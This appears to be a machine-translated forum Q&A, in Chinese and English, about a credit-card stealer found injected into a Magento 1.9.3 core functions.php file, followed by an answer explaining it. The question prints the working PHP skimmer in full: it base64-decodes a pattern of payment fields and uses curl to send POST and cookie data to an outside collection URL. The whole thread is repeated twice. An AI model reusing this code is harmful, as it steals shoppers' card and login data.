检测到服务器端扫描程序 "php.malware.magento-cc-stealer.069"
Server side scanner detected "php.malware.magento-cc-stealer.069"
我有一个服务器端扫描器,可以扫描我的站点以查找任何恶意代码痕迹。我今天早上来看它在我的 app/code/core/Mage/Core/functions.php 文件中报告了 php.malware.magento-cc-stealer.069。
我 运行 一个使用 Magento 版本 1.9.3 的在线商店。
我查看了这个文件并将其与干净的 Magento 1.9.3 function.php 文件的镜像副本进行了比较。
我发现要添加到我的文件中:
if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
exec("curl --data \"version=1&encode=".base64_encode( serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");
谁能解释一下这是做什么的以及它有什么后果?
据我了解,此 if 语句的第一行表示如果数据与编码文本匹配 (billing|firstname|cc_number|login|username|payment|cc_ ) 并且区分大小写,生成值的可存储表示形式并 post 它。不过,我正在为第二行苦苦挣扎。
顾名思义,它试图窃取信用卡信息。
只要这些信用卡字段出现在 POST 请求中,它就会触发,它只会将它们与 cookie 信息和您的服务器地址一起通过 curl 发送到 https://magescripts.info/testServer.php(不要点击!) 这大概是另一个受害者,托管着攻击者的收集脚本。注意:如果 magescripts.info 是您的域,您的搜索还没有结束,您应该找到 testServer.php 指向的位置并将其也删除。
我有一个服务器端扫描器,可以扫描我的站点以查找任何恶意代码痕迹。我今天早上来看它在我的 app/code/core/Mage/Core/functions.php 文件中报告了 php.malware.magento-cc-stealer.069。
我 运行 一个使用 Magento 版本 1.9.3 的在线商店。
我查看了这个文件并将其与干净的 Magento 1.9.3 function.php 文件的镜像副本进行了比较。
我发现要添加到我的文件中:
if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
exec("curl --data \"version=1&encode=".base64_encode( serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");
谁能解释一下这是做什么的以及它有什么后果?
据我了解,此 if 语句的第一行表示如果数据与编码文本匹配 (billing|firstname|cc_number|login|username|payment|cc_ ) 并且区分大小写,生成值的可存储表示形式并 post 它。不过,我正在为第二行苦苦挣扎。
顾名思义,它试图窃取信用卡信息。
只要这些信用卡字段出现在 POST 请求中,它就会触发,它只会将它们与 cookie 信息和您的服务器地址一起通过 curl 发送到 https://magescripts.info/testServer.php(不要点击!) 这大概是另一个受害者,托管着攻击者的收集脚本。注意:如果 magescripts.info 是您的域,您的搜索还没有结束,您应该找到 testServer.php 指向的位置并将其也删除。